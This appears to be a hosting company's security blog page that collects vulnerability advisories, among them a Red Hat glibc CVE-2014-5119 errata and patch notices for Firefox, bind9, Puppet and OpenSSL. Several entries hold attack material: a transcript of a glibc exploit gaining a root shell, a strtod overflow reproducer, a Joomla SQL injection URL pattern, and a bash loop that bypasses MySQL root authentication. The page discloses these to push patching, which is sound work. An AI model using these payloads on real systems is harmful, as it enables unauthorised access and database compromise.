Blog Page

glibc arbitrary code execution vulnerability (CVE-2014-0475 and CVE-2014-5119)

Two new vulnerabilities deemed as Important severity have been discovered and patched in glibc libraries.

In order for updates to take effect, a service restart for all daemons with a glibc dependency must occur. This includes, but is not limited to: Apache, MySQL Mail S
ervices, SSH, etc.

=====================================================================
Red Hat Security Advisory

Synopsis: Important: glibc security update
Advisory ID: RHSA-2014:1118-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1118.html
Issue date: 2014-09-02
CVE Names: CVE-2014-5119
=====================================================================

1. Summary:

Updated glibc packages that fix one security issue are now available for
Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9
Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update
Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AUS (v. 6.2 server) – x86_64
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) – x86_64
Red Hat Enterprise Linux EUS (v. 5.9 server) – i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux HPC Node EUS (v. 6.4) – x86_64
Red Hat Enterprise Linux LL (v. 5.6 server) – i386, ia64, x86_64
Red Hat Enterprise Linux Server EUS (v. 6.4) – i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional AUS (v. 6.2) – x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 6.4) – i386, ppc64, s390x, x86_64

3. Description:

The glibc packages contain the standard C libraries used by multiple
programs on the system. These packages contain the standard C and the
standard math libraries. Without these two libraries, a Linux system cannot
function properly.

An off-by-one heap-based buffer overflow flaw was found in glibc’s internal
__gconv_translit_find() function. An attacker able to make an application
call the iconv_open() function with a specially crafted argument could
possibly use this flaw to execute arbitrary code with the privileges of
that application. (CVE-2014-5119)

All glibc users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1119128 – CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find()

6. Package List:

Red Hat Enterprise Linux LL (v. 5.6 server):

Source:
glibc-2.5-58.el5_6.5.src.rpm

i386:
glibc-2.5-58.el5_6.5.i386.rpm
glibc-2.5-58.el5_6.5.i686.rpm
glibc-common-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.i386.rpm
glibc-headers-2.5-58.el5_6.5.i386.rpm
glibc-utils-2.5-58.el5_6.5.i386.rpm
nscd-2.5-58.el5_6.5.i386.rpm

ia64:
glibc-2.5-58.el5_6.5.i686.rpm
glibc-2.5-58.el5_6.5.ia64.rpm
glibc-common-2.5-58.el5_6.5.ia64.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-2.5-58.el5_6.5.ia64.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.ia64.rpm
glibc-headers-2.5-58.el5_6.5.ia64.rpm
glibc-utils-2.5-58.el5_6.5.ia64.rpm
nscd-2.5-58.el5_6.5.ia64.rpm

x86_64:
glibc-2.5-58.el5_6.5.i686.rpm
glibc-2.5-58.el5_6.5.x86_64.rpm
glibc-common-2.5-58.el5_6.5.x86_64.rpm
glibc-debuginfo-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-2.5-58.el5_6.5.x86_64.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.x86_64.rpm
glibc-headers-2.5-58.el5_6.5.x86_64.rpm
glibc-utils-2.5-58.el5_6.5.x86_64.rpm
nscd-2.5-58.el5_6.5.x86_64.rpm

Red Hat Enterprise Linux EUS (v. 5.9 server):

Source:
glibc-2.5-107.el5_9.7.src.rpm

i386:
glibc-2.5-107.el5_9.7.i386.rpm
glibc-2.5-107.el5_9.7.i686.rpm
glibc-common-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.i386.rpm
glibc-headers-2.5-107.el5_9.7.i386.rpm
glibc-utils-2.5-107.el5_9.7.i386.rpm
nscd-2.5-107.el5_9.7.i386.rpm

ia64:
glibc-2.5-107.el5_9.7.i686.rpm
glibc-2.5-107.el5_9.7.ia64.rpm
glibc-common-2.5-107.el5_9.7.ia64.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-2.5-107.el5_9.7.ia64.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.ia64.rpm
glibc-headers-2.5-107.el5_9.7.ia64.rpm
glibc-utils-2.5-107.el5_9.7.ia64.rpm
nscd-2.5-107.el5_9.7.ia64.rpm

ppc:
glibc-2.5-107.el5_9.7.ppc.rpm
glibc-2.5-107.el5_9.7.ppc64.rpm
glibc-common-2.5-107.el5_9.7.ppc.rpm
glibc-debuginfo-2.5-107.el5_9.7.ppc.rpm
glibc-debuginfo-2.5-107.el5_9.7.ppc64.rpm
glibc-devel-2.5-107.el5_9.7.ppc.rpm
glibc-devel-2.5-107.el5_9.7.ppc64.rpm
glibc-headers-2.5-107.el5_9.7.ppc.rpm
glibc-utils-2.5-107.el5_9.7.ppc.rpm
nscd-2.5-107.el5_9.7.ppc.rpm

s390x:
glibc-2.5-107.el5_9.7.s390.rpm
glibc-2.5-107.el5_9.7.s390x.rpm
glibc-common-2.5-107.el5_9.7.s390x.rpm
glibc-debuginfo-2.5-107.el5_9.7.s390.rpm
glibc-debuginfo-2.5-107.el5_9.7.s390x.rpm
glibc-devel-2.5-107.el5_9.7.s390.rpm
glibc-devel-2.5-107.el5_9.7.s390x.rpm
glibc-headers-2.5-107.el5_9.7.s390x.rpm
glibc-utils-2.5-107.el5_9.7.s390x.rpm
nscd-2.5-107.el5_9.7.s390x.rpm

x86_64:
glibc-2.5-107.el5_9.7.i686.rpm
glibc-2.5-107.el5_9.7.x86_64.rpm
glibc-common-2.5-107.el5_9.7.x86_64.rpm
glibc-debuginfo-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-2.5-107.el5_9.7.x86_64.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.x86_64.rpm
glibc-headers-2.5-107.el5_9.7.x86_64.rpm
glibc-utils-2.5-107.el5_9.7.x86_64.rpm
nscd-2.5-107.el5_9.7.x86_64.rpm

Red Hat Enterprise Linux HPC Node EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

x86_64:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-2.12-1.107.el6_4.6.x86_64.rpm
glibc-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.x86_64.rpm
glibc-headers-2.12-1.107.el6_4.6.x86_64.rpm
glibc-utils-2.12-1.107.el6_4.6.x86_64.rpm
nscd-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

x86_64:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux AUS (v. 6.2 server):

Source:
glibc-2.12-1.47.el6_2.13.src.rpm

x86_64:
glibc-2.12-1.47.el6_2.13.i686.rpm
glibc-2.12-1.47.el6_2.13.x86_64.rpm
glibc-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-devel-2.12-1.47.el6_2.13.i686.rpm
glibc-devel-2.12-1.47.el6_2.13.x86_64.rpm
glibc-headers-2.12-1.47.el6_2.13.x86_64.rpm
glibc-utils-2.12-1.47.el6_2.13.x86_64.rpm
nscd-2.12-1.47.el6_2.13.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

i386:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-headers-2.12-1.107.el6_4.6.i686.rpm
glibc-utils-2.12-1.107.el6_4.6.i686.rpm
nscd-2.12-1.107.el6_4.6.i686.rpm

ppc64:
glibc-2.12-1.107.el6_4.6.ppc.rpm
glibc-2.12-1.107.el6_4.6.ppc64.rpm
glibc-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-devel-2.12-1.107.el6_4.6.ppc.rpm
glibc-devel-2.12-1.107.el6_4.6.ppc64.rpm
glibc-headers-2.12-1.107.el6_4.6.ppc64.rpm
glibc-utils-2.12-1.107.el6_4.6.ppc64.rpm
nscd-2.12-1.107.el6_4.6.ppc64.rpm

s390x:
glibc-2.12-1.107.el6_4.6.s390.rpm
glibc-2.12-1.107.el6_4.6.s390x.rpm
glibc-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-devel-2.12-1.107.el6_4.6.s390.rpm
glibc-devel-2.12-1.107.el6_4.6.s390x.rpm
glibc-headers-2.12-1.107.el6_4.6.s390x.rpm
glibc-utils-2.12-1.107.el6_4.6.s390x.rpm
nscd-2.12-1.107.el6_4.6.s390x.rpm

x86_64:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-2.12-1.107.el6_4.6.x86_64.rpm
glibc-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.x86_64.rpm
glibc-headers-2.12-1.107.el6_4.6.x86_64.rpm
glibc-utils-2.12-1.107.el6_4.6.x86_64.rpm
nscd-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 6.2):

Source:
glibc-2.12-1.47.el6_2.13.src.rpm

x86_64:
glibc-debuginfo-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-static-2.12-1.47.el6_2.13.i686.rpm
glibc-static-2.12-1.47.el6_2.13.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

i386:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm

ppc64:
glibc-debuginfo-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-static-2.12-1.107.el6_4.6.ppc.rpm
glibc-static-2.12-1.107.el6_4.6.ppc64.rpm

s390x:
glibc-debuginfo-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-static-2.12-1.107.el6_4.6.s390.rpm
glibc-static-2.12-1.107.el6_4.6.s390x.rpm

x86_64:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from

https://access.redhat.com/security/team/key/#package

7. References:

https://www.redhat.com/security/data/cve/CVE-2014-5119.html

https://access.redhat.com/security/updates/classification/#important

https://access.redhat.com/solutions/1176253

CVE-2014-5119 glibc __gconv_translit_find() exploit

Date: Mon, 25 Aug 2014 19:00:15 -0700
From: Tavis Ormandy
To: fulldisclosure@…lists.org, oss-security@…ts.openwall.com
Subject: CVE-2014-5119 glibc __gconv_translit_find() exploit

List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte
heap metadata overflow in the glibc internal routine
__gconv_translit_find().

This is caused by the file extension being incorrectly appended to the
transliteration module filename. The result is one too few bytes are
allocated, and a single nul byte is written out of bounds. This issue
affects real programs, that are typically default installed and setuid root.

Despite explaining that my research suggests this is exploitable, it
appears there has been general skepticism that single-fixed-byte overflows
are still exploitable with modern allocator metadata hardening.

As a result, the issue has been largely dismissed and downgraded in
severity. As little progress has been made in resolving the issue thus far,
we’re publishing a proof of concept today. This exploit is specific to
Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation
on other systems and platforms is possible.

This issue is complex, and fiendishly difficult to exploit. Thanks to Chris
Evans for his heap expertise and insight. Some more information is
available on our team blog.

http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@...alhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl pkexploit.c -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl pty.c -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c
-o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@...alhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing / : File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

SimFS (VZ / OpenVZ) Security Vulnerability #PSBM-27641, #CVE-2014-3519

***UPDATE IMMEDIATELY – Vulnerability in simfs virtual filesystem***

A critical vulnerability in the legacy simfs Container filesystem was fixed. This affects OpenVZ and Parallels Virtuozzo Containers based on vzfs.

Note: ploop filesystems were not affected.

References:

http://www.webhostingtalk.com/showpo…0&postcount=38

https://openvz.org/Download/kernel/rhel6/042stab090.5

http://kb.parallels.com/en/122142

CVE-2013-4969: Puppet Vulnerability

Description

Puppet uses temp files unsafely by looking for a name it can use in a
directory, and then later writing to that file, creating a
vulnerability in which an attacker could make the name a symlink to
another file and thereby cause the puppet agent to overwrite something
that it did not intend to.

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4969

http://www.ubuntu.com/usn/usn-2077-1

Several Vulnerabilities in Mozilla Firefox, Thunderbird, Seamonkey



Updated software packages for Mozilla Firefox, Thunderbird, Seamonkey that fixes several recently discovered security issues is now available for nearly all operating systems and platforms.

You should upgrade your software immediately!




Patched and Secure Versions
If you are not using one of the versions below, you are vulnerable.

Firefox 18.0
Firefox ESR 10.0.12
Firefox ESR 17.0.2
Thunderbird 17.0.2
Thunderbird ESR 10.0.12
Thunderbird ESR 17.0.2
SeaMonkey 2.15





Related MFSAs

MFSA 2013-20
Mis-issued TURKTRUST certificates

MFSA 2013-19
Use-after-free in Javascript Proxy objects

MFSA 2013-18
Use-after-free in Vibrate

MFSA 2013-17
Use-after-free in ListenerManager

MFSA 2013-16
Use-after-free in serializeToStream

MFSA 2013-15
Privilege escalation through plugin objects

MFSA 2013-14
Chrome Object Wrapper (COW) bypass through changing prototype

MFSA 2013-13
Memory corruption in XBL with XML bindings containing SVG

MFSA 2013-12
Buffer overflow in Javascript string concatenation

MFSA 2013-11
Address space layout leaked in XBL objects

MFSA 2013-10
Event manipulation in plugin handler to bypass same-origin policy

MFSA 2013-09
Compartment mismatch with quickstubs returned values

MFSA 2013-08
AutoWrapperChanger fails to keep objects alive during garbage collection

MFSA 2013-07
Crash due to handling of SSL on threads

MFSA 2013-05
Use-after-free when displaying table with many columns and column groups

MFSA 2013-04
URL spoofing in addressbar during page loads

MFSA 2013-03
Buffer Overflow in Canvas

MFSA 2013-02
Use-after-free and buffer overflow issues found using Address Sanitizer

MFSA 2013-01
Miscellaneous memory safety hazards (rv:18.0/ rv:10.0.12 / rv:17.0.2)

MFSA 2012-98
Firefox installer DLL hijacking




Related CVEs:

91811 – CVE-2013-0769 Mozilla: Miscellaneous memory safety hazards (rv:10.0.12) (MFSA 2013-01)
891821 – CVE-2013-0762 CVE-2013-0766 CVE-2013-0767 Mozilla: Use-after-free & buffer overflow w/Address Sanitizer (MFSA 2013-02)
891824 – CVE-2013-0759 Mozilla: URL spoofing in addressbar during page loads (MFSA 2013-04)
891825 – CVE-2013-0744 Mozilla: Use-after-free when displaying table with many columns and column groups (MFSA 2013-05)
892142 – CVE-2013-0746 Mozilla: Compartment mismatch with quickstubs returned values (MFSA 2013-09)
892144 – CVE-2013-0748 Mozilla: Address space layout leaked in XBL objects (MFSA 2013-11)
892145 – CVE-2013-0750 Mozilla: Buffer overflow in Javascript string concatenation (MFSA 2013-12)
892148 – CVE-2013-0758 Mozilla: Chrome Object Wrapper (COW) bypass through plugin objects (MFSA 2013-15)
892149 – CVE-2013-0753 Mozilla: Use-after-free in serializeToStream (MFSA 2013-16)
892150 – CVE-2013-0754 Mozilla: Use-after-free in ListenerManager (MFSA 2013-17)




References:
http://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html
https://rhn.redhat.com/errata/RHSA-2013-0144.html
https://rhn.redhat.com/errata/RHSA-2013-0145.html

CVE-2012-3480: glibc overflow vulnerability

This issue affects the versions of the glibc package, as shipped with RHEL 5 and 6 and Fedora 16, 17.

Note: this was just reported and an official patch from RHEL is not yet available.

Vulnerability details

multiple integer overflows, leading to stack-based buffer overflows were found in various stdlib functions of GNU libc (strtod, strtof, strtold, strtod_l and related routines). If an application, using the affected stdlib functions, did not perform user-level sanitization of provided inputs, a local attacker could use this flaw to cause such an application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.

* Upstream bug report:
[1] http://sourceware.org/bugzilla/show_bug.cgi?id=14459

* Upstream patch (might not be the final one):
[2] http://sourceware.org/ml/libc-alpha/2012-08/msg00202.html

* References:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=847715

Sample reproducer from upstream bug

#include
#include
#include

#define EXPONENT “e-2147483649″
#define SIZE 214748364

int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror (“malloc”);
exit (EXIT_FAILURE);
}
p[0] = ’1′;
memset (p + 1, ’0′, SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf (“%a\n”, d);
exit (EXIT_SUCCESS);
}

Reference: http://www.openwall.com/lists/oss-security/2012/08/13/4

2 Joomla SQL Injection Vulnerabilities Discovered

Two SQL Injection vulnerabilities were recently detected in the com_package and com_photo modules of the joomla Content Management System. Remote attackers & low privileged user accounts can execute/inject own sql commands to compromise the application database. The vulnerability is located in the com_package module with the bound vulnerable id parameter. Successful exploitation of the vulnerability result in database (Server) or application (Web) compromise.

com_package vulnerability:


Vulnerable Module(s):

  • index.php?option=com_package

Vulnerable Parameter(s):

  • id

com_photo vulnerability:

Vulnerable Module(s):

  • index.php?option=com_photo

Vulnerable Parameter(s):

  • AlbumId
  • key



Patching and Mitigation:

  • These exploits are in the early stages of discovery, and as such no vendor patches or fixes have been released at the present time. Updates will be posted when a patch or new release is available.

Proof of Concept:


The SQL Injection vulnerabilities can be exploited by remote attackers without privileged user account or required user inter action. For demonstration or reproduce …


Path: /
File: index.php
Module: ?option=com_package
Parameter: details&id=-1′[SQL Injection]–
URL: http://www.xxx.com/index.php?option=com_package&task=details&id=174-1′[SQL Injection]–

References:


http://www.vulnerability-lab.com/get_content.php?id=652
http://www.vulnerability-lab.com/get_content.php?id=654

bind9 denial of service (remote) (CVE-2012-3817)

Package : bind9
Vulnerability : denial of service
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-3817

Einar Lonn discovered that under certain conditions bind9, a DNS server,
may use cached data before initialization. As a result, an attacker can
trigger and assertion failure on servers under high query load that do
DNSSEC validation.

We recommend that you upgrade your bind9 packages.

mySQL vulnerabilities up to 5.1.61, 5.2.11, 5.3.5, 5.5.22

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

Proof of Concept


In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Vulnerability Outline

  • All MariaDB/MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
  • This issue got assigned an id CVE-2012-2122.

Vulnerability Details

Here’s the issue. When a user connects to MariaDB/MySQL, a token (SHA
over a password and a random scramble string) is calculated and compared
with the expected value. Because of incorrect casting, it might’ve
happened that the token and the expected value were considered equal,
even if the memcmp() returned a non-zero value. In this case
MySQL/MariaDB would think that the password is correct, even while it is
not. Because the protocol uses random strings, the probability of
hitting this bug is about 1/256.

Which means, if one knows a user name to connect (and “root” almost
always exists), she can connect using *any* password by repeating
connection attempts. ~300 attempts takes only a fraction of second, so
basically account password protection is as good as nonexistent.
Any client will do, there’s no need for a special libmysqlclient library.

But practically it’s better than it looks – many MySQL/MariaDB builds
are not affected by this bug.

Whether a particular build of MySQL or MariaDB is vulnerable, depends on
how and where it was built. A prerequisite is a memcmp() that can return
an arbitrary integer (outside of -128..127 range). To my knowledge gcc
builtin memcmp is safe, BSD libc memcmp is safe. Linux glibc
sse-optimized memcmp is not safe, but gcc usually uses the inlined
builtin version.

Patch Details


The password.c source can be patched against this vulnerability by replacing line 534 with:

return test(memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE));

Vendor Patches


Please check with your current OS vendor to see if patched binaries are available for updating.

Let us patch it


Click on “schedule a consultation” to have our experts ensure your database security.

OpenSSL Still vulnerable, fix CVE-2012-2110 not sufficient!

It was discovered that the fix for CVE-2012-2110 released on 19 Apr
2012 and referenced in this post on unhackable, was not sufficient to correct the issue for OpenSSL 0.9.8.

Please see http://www.openssl.org/news/secadv_20120419.txt for details of that vulnerability.

This issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain a patch sufficient to correct CVE-2012-2110.

Thanks to Red Hat for discovering and fixing this issue.

Affected users should upgrade to 0.9.8w.